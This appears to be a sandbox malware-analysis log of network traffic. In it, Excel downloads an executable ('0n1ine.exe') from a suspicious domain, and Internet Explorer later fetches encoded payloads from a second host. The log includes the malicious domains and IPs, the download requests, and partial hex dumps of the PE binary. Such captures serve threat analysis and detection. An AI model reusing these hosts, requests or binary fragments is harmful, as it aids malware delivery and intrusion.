May 27, 2020 10:30:25.333288908 CEST	8.8.8.8	192.168.1.102	0x9139	No error (0)	l-0014.config.skype.com	config-edge-skype.l-0014.l-msedge.net		CNAME (Canonical name)	IN (0x0001)
May 27, 2020 10:30:46.077400923 CEST	8.8.8.8	192.168.1.102	0x9090	No error (0)	gstat.ddoborguild.com		85.239.35.110	A (IP address)	IN (0x0001)
May 27, 2020 10:30:46.077400923 CEST	8.8.8.8	192.168.1.102	0x9090	No error (0)	gstat.ddoborguild.com		45.143.139.9	A (IP address)	IN (0x0001)
May 27, 2020 10:30:46.077400923 CEST	8.8.8.8	192.168.1.102	0x9090	No error (0)	gstat.ddoborguild.com		46.148.21.36	A (IP address)	IN (0x0001)
May 27, 2020 10:31:04.476974010 CEST	8.8.8.8	192.168.1.102	0x125d	Name error (3)	mcc.avast.com	none	none	A (IP address)	IN (0x0001)
May 27, 2020 10:31:04.505984068 CEST	8.8.8.8	192.168.1.102	0xefb0	Name error (3)	mcc.avast.com	none	none	A (IP address)	IN (0x0001)
May 27, 2020 10:31:04.600909948 CEST	8.8.8.8	192.168.1.102	0xf15a	Name error (3)	mcc.avast.com	none	none	A (IP address)	IN (0x0001)
May 27, 2020 10:31:51.017995119 CEST	8.8.8.8	192.168.1.102	0x6117	Name error (3)	mcc.avast.com	none	none	A (IP address)	IN (0x0001)
May 27, 2020 10:31:51.061683893 CEST	8.8.8.8	192.168.1.102	0x4c6a	Name error (3)	mcc.avast.com	none	none	A (IP address)	IN (0x0001)
May 27, 2020 10:31:51.110342026 CEST	8.8.8.8	192.168.1.102	0x3472	Name error (3)	mcc.avast.com	none	none	A (IP address)	IN (0x0001)
May 27, 2020 10:32:14.272124052 CEST	8.8.8.8	192.168.1.102	0x5b56	No error (0)	line.beibiandmom.com		89.111.132.159	A (IP address)	IN (0x0001)
May 27, 2020 10:32:14.272124052 CEST	8.8.8.8	192.168.1.102	0x5b56	No error (0)	line.beibiandmom.com		45.143.137.184	A (IP address)	IN (0x0001)
May 27, 2020 10:32:18.311316967 CEST	8.8.8.8	192.168.1.102	0x74ee	No error (0)	line.beibiandmom.com		185.98.87.176	A (IP address)	IN (0x0001)
May 27, 2020 10:32:18.311316967 CEST	8.8.8.8	192.168.1.102	0x74ee	No error (0)	line.beibiandmom.com		77.87.213.82	A (IP address)	IN (0x0001)
May 27, 2020 10:32:24.022182941 CEST	8.8.8.8	192.168.1.102	0x3b3a	No error (0)	line.beibiandmom.com		185.98.87.176	A (IP address)	IN (0x0001)
May 27, 2020 10:32:24.022182941 CEST	8.8.8.8	192.168.1.102	0x3b3a	No error (0)	line.beibiandmom.com		77.87.213.82	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gstat.ddoborguild.com

line.beibiandmom.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.102	49709	85.239.35.110	80	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
May 27, 2020 10:30:46.137635946 CEST	138	OUT	GET /0n1ine.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: gstat.ddoborguild.com Connection: Keep-Alive
May 27, 2020 10:30:46.183968067 CEST	139	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Wed, 27 May 2020 08:30:46 GMT Content-Type: application/octet-stream Content-Length: 167424 Last-Modified: Wed, 27 May 2020 08:30:02 GMT Connection: keep-alive ETag: "5ece250a-28e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b 61 e0 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 be 01 00 00 56 44 00 00 00 00 00 73 04 01 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 46 00 00 04 00 00 1c 32 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 c7 01 00 28 00 00 00 00 70 45 00 50 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 bd 01 00 00 10 00 00 00 be 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 20 73 43 00 00 d0 01 00 00 2c 00 00 00 c2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 76 69 64 75 00 00 14 00 00 00 50 45 00 00 06 00 00 00 ee 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 98 00 00 00 70 45 00 00 9a 00 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c c9 01 00 4c c9 01 00 58 c9 01 00 6a c9 01 00 72 c9 01 00 28 c9 01 00 90 c9 01 00 a0 c9 01 00 b2 c9 01 00 ce c9 01 00 14 c9 01 00 04 c9 01 00 f8 c8 01 00 ec c8 01 00 ee c9 01 00 00 ca 01 00 16 ca 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELKa]VDs@F2(pEP@.text `.data sC,@.peviduPE@.rsrcPpE@@<LXjr(
May 27, 2020 10:30:46.184025049 CEST	141	IN	Data Raw: 00 28 ca 01 00 3a ca 01 00 4e ca 01 00 6a ca 01 00 88 ca 01 00 9c ca 01 00 a8 ca 01 00 b4 ca 01 00 d0 ca 01 00 e0 ca 01 00 f0 ca 01 00 fe ca 01 00 0e cb 01 00 24 cb 01 00 3a cb 01 00 54 cb 01 00 6a cb 01 00 84 cb 01 00 96 cb 01 00 be cb 01 00 cc Data Ascii: (:Nj$:Tj.>Tlz(2>P^nA^A4A{A[A
May 27, 2020 10:30:46.184052944 CEST	142	IN	Data Raw: 00 75 00 72 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 0d 00 0a 00 00 00 00 00 52 00 36 00 30 00 33 00 30 00 0d 00 0a 00 2d 00 20 00 43 00 52 00 54 00 20 00 6e 00 6f 00 74 00 20 00 69 00 6e 00 69 00 74 00 69 Data Ascii: ur application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for
May 27, 2020 10:30:46.184096098 CEST	143	IN	Data Raw: 00 19 00 00 00 28 17 40 00 1a 00 00 00 b8 16 40 00 1b 00 00 00 48 16 40 00 1c 00 00 00 f8 15 40 00 1e 00 00 00 b8 15 40 00 1f 00 00 00 f0 14 40 00 20 00 00 00 88 14 40 00 21 00 00 00 98 12 40 00 78 00 00 00 74 12 40 00 79 00 00 00 58 12 40 00 7a Data Ascii: (@@H@@@@ @!@xt@yX@z<@4@@Microsoft Visual C++ Runtime Library...<program name unknown>
May 27, 2020 10:30:46.184122086 CEST	145	IN	Data Raw: 75 61 6c 20 64 69 73 70 6c 61 63 65 6d 65 6e 74 20 6d 61 70 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 Data Ascii: ual displacement map'`vector vbase constructor iterator'`vector destructor iterator'`vector constructor iterator'`scalar deleting destructor'`default constructor closure'`vector deleting destructor'`vbase destructor'`str
May 27, 2020 10:30:46.184156895 CEST	146	IN	Data Raw: 00 72 00 63 00 68 00 00 00 46 00 65 00 62 00 72 00 75 00 61 00 72 00 79 00 00 00 00 00 4a 00 61 00 6e 00 75 00 61 00 72 00 79 00 00 00 44 00 65 00 63 00 00 00 4e 00 6f 00 76 00 00 00 4f 00 63 00 74 00 00 00 53 00 65 00 70 00 00 00 41 00 75 00 67 Data Ascii: rchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTuesdayMonda
May 27, 2020 10:30:46.184182882 CEST	147	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 68 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: h(((( H
May 27, 2020 10:30:46.184218884 CEST	149	IN	Data Raw: 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 Data Ascii: ()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~+jB""2L[6Y:`Rj.=?BHi TgCAq\|Mx~6K)g,kY^sd5teh97{lQ'n&N23UD@Z
May 27, 2020 10:30:46.184245110 CEST	150	IN	Data Raw: da 28 5f a6 c1 c7 61 74 67 07 18 38 fe c4 6f d5 17 d5 e2 1a 6f 25 c0 a4 20 b2 80 3c 13 d8 d1 7f e1 92 4c fd 7b 14 9a fa 5b 66 25 7a df cf 0c 6c 20 79 62 39 62 e8 e4 7d 93 8f 70 38 51 7d d7 d6 69 14 85 0b d4 8d b1 ff cf 82 c8 87 73 9c 28 bf 61 74 Data Ascii: (_atg8oo% <L{[f%zl yb9b}p8Q}is(atXaltOzdUP"tCHkE:.\"]qK~v9)z` D1DTAo.7'kHCo79BXqzg8D+ow
May 27, 2020 10:30:46.184269905 CEST	152	IN	Data Raw: 4b 3c f9 42 53 1f ec 27 fc cf 54 e4 c3 2f b9 1c 70 de 3c b2 f6 b0 15 05 1b 9a 5d 97 92 c8 28 a1 2d f8 6b b6 9a b7 a7 af 47 29 4c 05 6f 96 8d 4c 12 c7 51 c5 5c f2 b6 44 28 c1 f1 a5 13 98 eb 1c ce 93 cc 62 a4 6f 66 78 f4 5c 71 df 19 10 ff 68 72 d6 Data Ascii: K<BS'T/p<](-kG)LoLQ\D(bofx\qhrF[QGLk=_r7~Qq4MJZx5yBENH/+@)v(<^B]>Z9fqo-}n'nk+^31e7"*cRiWnS_NNH=mF :t@/yA
May 27, 2020 10:30:46.231329918 CEST	153	IN	Data Raw: 23 5a 2c 64 09 ea bb 40 59 58 c3 7e 63 61 f0 96 fd ec d1 1a ad 79 6a c7 2e 4c 18 36 93 93 48 ba f2 ef 8a 6f c9 81 89 b6 ae c6 c9 cf f1 1a 89 22 fa 83 65 3e 1c 1f 27 84 36 07 e9 b2 58 27 fb 4d 62 74 ac 3a 09 c9 c1 d0 a3 25 a0 27 cd 26 36 cc 50 f5 Data Ascii: #Z,d@YX~cayj.L6Ho"e>'6X'Mbt:%'&6PZ)fgf+H+M&pLoR#PUHkNj%IPT>:kCpz1oBomX1:}`A+J+Hnm4]'(ar-/p_~oQvLz6#@bH

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.102	49711	89.111.132.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 27, 2020 10:32:14.383591890 CEST	317	OUT	GET /images/YqDbBmJ03/HYNI5QMFQ8KnA0Xlg2l4/IETRZjPpb2nK14jcJh7/OeJxoopStvUXHEz47drnw5/oWWDMZhUKORHw/illHxVP8/_2F_2FqJ9TdlRGk6Rd0_2BD/fm9UfWK99O/jXxQB7II3lMb6Vbk5/0fe74JetcpI/2xLI.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: line.beibiandmom.com Connection: Keep-Alive
May 27, 2020 10:32:15.048496962 CEST	318	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Wed, 27 May 2020 08:32:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=qi33dci21u6eo799r71ifb9d03; path=/; domain=.line.beibiandmom.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: lang=en; expires=Fri, 26-Jun-2020 08:32:14 GMT; path=/; domain=.line.beibiandmom.com Content-Encoding: gzip Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9c c5 96 a4 5a 14 44 3f 28 07 58 62 43 dc dd 12 66 b8 16 ee 5f ff 6e bf b5 7a 58 5d 05 24 f7 48 c4 8e 84 c9 4a 87 0c 79 3b b0 6a e2 65 9a 3a 8b 85 fd d5 4e 97 c6 1e cb 19 cf ac 27 41 06 bb 44 09 3d b8 11 46 aa 52 32 e8 80 34 b1 12 8d b2 0e 13 4c 73 98 a2 96 fa 1e e6 db 37 b2 7f 5e 3c ee 39 f3 15 8b f4 8f 30 74 f9 a2 c5 bf 8d c3 ef 0c ef d7 5b f7 69 9e 6c ff ac 67 44 f0 d8 5d 9d 4f 16 4d c2 19 cf 78 18 5b 02 31 cb 59 f0 c9 84 8d de d4 c3 d1 d0 9a ee 43 ef 9b 85 d1 ae 2d b7 b5 e9 24 45 68 5e 69 b8 f3 34 9e c4 e3 f6 68 23 41 54 8e 22 da 67 82 dd dc ee 3f 27 e7 7d 1a 52 70 bf 30 cd dd cc 9e bc f0 9c c1 4c df 66 bc 8d 84 a7 10 13 54 79 d1 fd 8f 58 9f 4b 0f 89 d9 0a d6 b2 4e 36 ec 9a 92 fc a9 bd dd a3 8e 46 e8 ef 80 67 bb 65 35 d2 4e ee 37 eb 93 4b 58 86 d5 66 ac d3 aa 83 13 95 f9 c8 49 68 1e d5 e0 cd a9 19 d4 a5 1b c2 1f 06 7e 0d f6 42 3b 27 1f 58 43 70 4b 63 d6 e0 46 b4 08 ee 08 8a 7e f1 17 a4 b5 db b4 81 27 d6 c9 f1 30 c2 7a a9 a3 eb e4 93 f5 5f 6c 43 27 6e 0d ef f5 f6 3e 72 b9 7f f5 37 d7 cf 05 d7 97 1c 49 85 2c 48 a1 3f 0a e6 ac e0 8f 63 4f 94 e8 b0 f2 65 e9 f5 97 d8 0b c9 8e 7f 54 4d b4 7f bd 9c fe 35 74 3e 26 a6 2f 43 08 0f 87 5f 46 6e 25 2c 65 e9 c3 cc b8 1f 05 97 12 d7 fa 43 83 35 df 5c 75 66 ba 23 ac 15 ba 8a b2 7d 72 02 4d 55 27 72 da 72 f4 ba d1 c6 db aa 57 70 6a d1 b7 2a 9b 67 d5 f6 71 ed c5 fb ea 65 db 95 66 ff 54 62 37 28 e4 4f 2c f2 d1 a8 e4 bf 63 d5 02 0d eb 49 fd 0c 6b 4b 3c 3e c5 d9 dc b7 73 9c 63 5b e2 c8 21 58 66 90 e8 6d 4f 6a 92 82 fa 36 74 ef 84 68 f0 5c 85 5d fa 66 79 3d ce 37 a2 4e 70 9d f5 33 cd b0 17 31 d4 78 0b 58 2d 3d d8 f4 ea 36 c1 7c 6a 70 7a fd 57 35 d1 d4 30 ea 3a 8c b1 68 84 4a c8 9f a2 1c 68 7d 11 0f 3d 3f e1 5e 3f 47 35 4d 28 db 1b b8 d5 0b df 8a 94 c3 d5 5b f2 89 64 08 8f 24 4c 7f 3b 92 ca 7f b4 8c a0 a8 67 fb 85 bc b2 69 cc f5 10 3b 3b a1 6d 8d fb 01 e7 c1 23 d5 c5 1d a0 ba 98 74 38 f5 09 eb 52 c7 9d f0 8c 39 21 4b 47 8d dd 16 41 b8 1e a4 f0 56 8c e4 ef a4 f4 b3 4e 68 96 b2 f8 53 45 71 fd 61 85 b4 d5 bf e8 a9 fd 8b a4 d5 7d 34 e9 ca f9 f2 01 91 66 c9 dc 5b 17 67 3e 0f 5a d9 da 05 79 ae 2b b1 ef f6 cd fe 0a 14 f9 16 fe 9b 67 82 ec 36 75 bc 62 2f 47 ba 62 4b 05 22 d7 52 7b 84 12 f0 a8 97 47 47 69 cc f6 c1 c6 2e 37 c6 61 c6 fa 2f 31 2d 54 1a 20 c1 d4 67 9c a0 f4 a7 8f f7 c6 35 66 df c9 53 4b 9e 56 2d 77 cb ea 0f 31 2f 96 52 51 a9 7c 4f 9c d9 3c 44 dd 64 e9 e5 1b c8 05 49 2d 4f 97 3b 41 8e 18 83 Data Ascii: 300aZD?(XbCf_nzX]$HJy;je:N'AD=FR24Ls7^<90t[ilgD]OMx[1YC-$Eh^i4h#AT"g?'}Rp0LfTyXKN6Fge5N7KXfIh~B;'XCpKcF~'0z_lC'n>r7I,H?cOeTM5t>&/C_Fn%,eC5\uf#}rMU'rrWpj*gqefTb7(O,cIkK<>sc[!XfmOj6th\]fy=7Np31xX-=6\|jpzW50:hJh}=?^?G5M([d$L;gi;;m#t8R9!KGAVNhSEqa}4f[g>Zy+g6ub/GbK"R{GGi.7a/1-T g5fSKV-w1/RQ\|O<DdI-O;A
May 27, 2020 10:32:15.048542976 CEST	320	IN	Data Raw: 15 b2 94 25 77 fd 53 2b 5b 12 be 3f 26 eb 43 04 de 7b d1 a2 d8 3b 8d 94 f2 7b c8 cc 2e 5e 09 0c 67 7c 56 fb df 01 7a 0c 58 d0 9d cb 80 6e d6 d3 88 6a cf 3c d2 d3 7e 49 3b a2 da d7 41 f9 e2 d7 3c 05 c2 e7 21 8e 8a 6a 5e de 50 de 2d e1 9e 21 37 6f Data Ascii: %wS+[?&C{;{.^g\|VzXnj<~I;A<!j^P-!7ok.q6?q'H.J66N5 nI/'Q3s~Y69=T)o_[krX&ffwDu_,GD)e+tr51uj<\uH_majL!\
May 27, 2020 10:32:15.048562050 CEST	321	IN	Data Raw: 5d 26 d8 cb d8 59 f9 dd 1e c1 42 78 a4 89 0a d5 b2 9a 73 33 a0 5f 53 77 f0 56 73 a5 54 0e 8f ea 88 8f f2 c1 24 38 66 f1 a8 1f 42 95 ae a1 f2 76 bf 6f 6b c8 f2 31 fc 4e f6 d8 11 b2 0d a1 27 45 d5 e5 2f 23 c2 fd 37 1d 44 38 30 fa 61 a5 65 8b d3 cd Data Ascii: ]&YBxs3_SwVsT$8fBvok1N'E/#7D80ae]*Jmq'R)Mf+Lqk3N]S%K2ww;03e=%'l5&],gEA\|p8`\|omS!#GP=p<FElW{r"B+/qo&
May 27, 2020 10:32:15.048578978 CEST	322	IN	Data Raw: 19 9b fb 77 fb 85 51 f7 ce 7c 0b 6f 41 86 d3 86 f9 9d a4 4f a6 0b a9 6d 31 33 f5 2b b5 e4 cf 2e 65 ea f0 1a 44 a3 29 fb af 5a 9f 47 95 7e eb 8a 49 0d f8 94 b8 e1 02 07 e0 4f 93 05 c8 c2 7f 63 32 fc fd 8a ad c9 c6 4c be a3 fd af 12 9c 4d 9a 7d 4b Data Ascii: wQ\|oAOm13+.eD)ZG~IOc2LM}KHsPXZ o6L1rI}_a>8hx-4 ^Kg*KFPacu!Ef}L&3CVG9p]LF:
May 27, 2020 10:32:15.048595905 CEST	324	IN	Data Raw: 7d 06 c4 9e 20 35 b7 b9 9e 4c 38 01 fb 71 8b f1 81 60 42 88 55 94 2d 42 56 cc 1b c3 e5 49 11 95 dc 37 d8 65 a1 60 a8 74 5c 2e c2 ff a4 7f 5f 33 aa b6 e0 2d 32 81 c3 eb 06 4f fc d8 92 a8 90 0b f7 aa d6 eb af 60 e2 11 90 92 86 5e 16 0b 34 0f 29 a2 Data Ascii: } 5L8q`BU-BVI7e`t\._3-2O`^4):?r9G)UQ"G[85:k9%s"St- z81/;Y\/$wi7tR(YUI*?E #g0)A..Eq_?4C7&k7F
May 27, 2020 10:32:15.048618078 CEST	325	IN	Data Raw: 53 6f 04 be 7d 8a b8 c6 db f9 87 01 d7 cf 12 de 32 c8 20 2e 06 92 aa e6 b5 2b 0c 5d 3a 78 ee 40 f2 ff aa 6e 1f a1 45 f5 d7 41 91 2d bb df cf 10 ed db 29 93 bf 0e 1e f9 21 f0 79 0c 9d 45 4e 6a 27 50 30 be 6b 4e 9e d4 7d 56 4c 0a 91 df 76 76 23 ca Data Ascii: So}2 .+]:x@nEA-)!yENj'P0kN}VLvv#p!H@)h?ytN!E^6LMEG_CY Y&t51T\|1GCo8}u8@Y\w;_<r
May 27, 2020 10:32:15.048635006 CEST	327	IN	Data Raw: 66 fd 80 05 00 f9 a2 0c 2d fa dd a7 64 70 b3 37 1c 21 d9 24 e0 5b d6 34 c4 dd 37 87 eb 5f 5c b2 e7 fb c2 69 ad 3c 13 03 31 9c 0d 3f 84 dc 15 64 49 0c cb cf 97 33 02 80 9e 04 d9 df 57 ab 61 50 c0 c2 35 fe 14 a8 71 91 e4 1f b6 fb 69 76 6e 72 97 81 Data Ascii: f-dp7!$[47_\i<1?dI3WaP5qivnrysd_I\h\|!O;f~J2XsI>nD9JUYhp'88!#(S"Z,f:s~6e HrSvZ&EPn:y#A[fCyg&9MOcL
May 27, 2020 10:32:15.048651934 CEST	328	IN	Data Raw: f0 45 ac 48 67 0c f6 8c 4e f6 07 3d 53 23 a8 71 93 f8 2b 41 71 9b 5b 84 2b 5e 9c 12 02 00 49 8e 13 73 e9 1e 36 52 e8 c2 2c 8c cd ce 92 99 79 d9 27 e7 4c 95 68 80 a9 53 7c 42 60 54 ba 06 19 13 89 a5 c5 39 f2 37 61 63 ac 62 19 32 2c 1f 60 f4 6b dd Data Ascii: EHgN=S#q+Aq[+^Is6R,y'LhS\|B`T97acb2,`k'sQmS(*U3.?LEd?cd'9VYVQs.OWn }zuiRJH>ZCKZ8,qNln=5z
May 27, 2020 10:32:15.048671007 CEST	329	IN	Data Raw: 6f 41 58 42 17 92 65 49 06 f2 95 87 76 5e 2f 5a 96 f4 9a f6 4f 30 6c 9d 4c b9 76 97 d7 99 63 17 5c 7f a5 ab 5b 12 ce 63 6a a2 5d 7c 6a 4b 45 b9 f0 70 bd c9 a7 57 fd a4 bf 1b fb e5 e1 75 6a 68 6e 1a 3d 43 80 bd 72 7a 34 2b 85 82 15 a5 17 ea 60 c2 Data Ascii: oAXBeIv^/ZO0lLvc\[cj]\|jKEpWujhn=Crz4+`Pvh>u"H].rd=p-4\Jt6x)9YhLx_Y>p?/GASY,'*sP>.DRs"G$c;/?dLX,AKPCR
May 27, 2020 10:32:15.048690081 CEST	330	IN	Data Raw: eb b4 48 a5 2d 34 71 9b f9 4f 03 31 14 e9 43 ce 3f aa 93 cd 63 14 0f 07 c0 db 3f c5 22 12 70 12 60 e2 9a ed 31 46 b3 bd 5d 5d 1b f2 01 58 c2 91 e2 87 c5 bf 95 a1 b1 71 64 10 55 8f d8 44 1d bf 29 98 82 eb 4c 03 41 88 5f 87 c9 de 2b 7f 66 8d 62 00 Data Ascii: H-4qO1C?c?"p`1F]]XqdUD)LA_+fb8Y]$jl`/\|'jb*.d.\usG KlFd8h4ymhnxH8\|xTv~j^MM#,7i?O=G<k0iYg%6
May 27, 2020 10:32:15.235528946 CEST	331	IN	Data Raw: 33 30 30 30 0d 0a 7b e9 01 d2 4b f8 99 2f a0 e9 32 2e ba 28 71 e4 aa 16 70 a6 02 63 04 68 50 a4 58 61 38 ce 91 ee ca f0 6c 04 f0 35 1e b2 7c 01 dd c0 58 b9 9f f7 25 db 5a 01 a6 6a 20 7a f1 39 5e 97 39 eb b4 15 b7 c6 c2 61 c2 86 a1 9f f3 9e db 46 Data Ascii: 3000{K/2.(qpchPXa8l5\|X%Zj z9^9aFQ07Rg&s;A]\|y'k6XL0r1MdC#Mxu(&'/`GI)wve:}J3Aq?CXoR@C/"kHK3u
May 27, 2020 10:32:15.751056910 CEST	499	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: line.beibiandmom.com Connection: Keep-Alive Cookie: PHPSESSID=qi33dci21u6eo799r71ifb9d03; lang=en
May 27, 2020 10:32:16.211739063 CEST	500	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Wed, 27 May 2020 08:32:16 GMT Content-Type: image/vnd.microsoft.icon Content-Length: 5430 Connection: keep-alive Last-Modified: Thu, 14 May 2020 08:03:45 GMT ETag: "1536-5a59722c6cecc" Accept-Ranges: bytes Data Raw: 00 00 01 00 02 00 10 10 00 00 00 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 87 73 f7 9c 87 73 f9 9c 87 73 f7 9c 87 73 77 9c 87 72 03 ff ff ff 01 9c 87 73 09 9c 87 73 0f 9c 87 73 0d 9b 87 73 05 ff ff ff 01 9c 87 73 15 9c 87 73 c7 9c 87 73 f9 9c 87 73 f9 9c 87 73 85 9c 87 73 f9 9c 87 72 f9 9c 87 73 7b 9c 87 73 05 9c 87 73 23 9c 87 73 7f 9c 87 73 c3 9b 87 72 d3 9c 87 73 cf 9c 87 73 ad 9c 87 73 5b 9c 87 73 0d 9c 87 73 1b 9c 87 73 c5 9b 87 73 ff 9c 87 73 85 9c 87 73 f7 9c 87 73 7d 9c 87 73 07 9c 87 73 57 9c 87 72 db 9c 87 73 ab 9c 87 73 6d 9c 87 73 4b 9c 87 73 43 9c 87 73 77 9c 87 73 cf 9c 87 73 b7 9b 86 73 25 9c 87 73 21 9c 87 73 cb 9c 87 73 87 9c 87 73 7f 9c 87 73 05 9c 87 73 55 9c 87 73 e1 9c 87 73 59 9c 87 73 81 9c 87 73 df 9c 87 73 c9 9b 86 72 23 ff ff ff 01 9c 87 73 13 9c 87 73 97 9c 87 73 cd 9c 87 73 19 9c 87 72 25 9c 87 73 5b 9c 87 73 03 9c 87 73 1d 9c 87 73 d9 9c 87 73 5d 9c 87 73 0b 9b 87 72 ef 9c 87 73 53 9b 87 73 bf 9c 87 73 71 ff ff ff 01 ff ff ff 01 9c 87 73 0b 9c 87 73 a5 9c 87 73 95 9c 87 73 03 9c 87 73 03 ff ff ff 01 9c 87 73 75 9c 87 73 b5 9c 87 73 07 ff ff ff 01 9c 87 73 c1 9c 87 73 db 9c 87 73 e7 9c 87 73 41 ff ff ff 01 ff ff ff 01 ff ff ff 01 9c 86 73 25 9b 87 73 d9 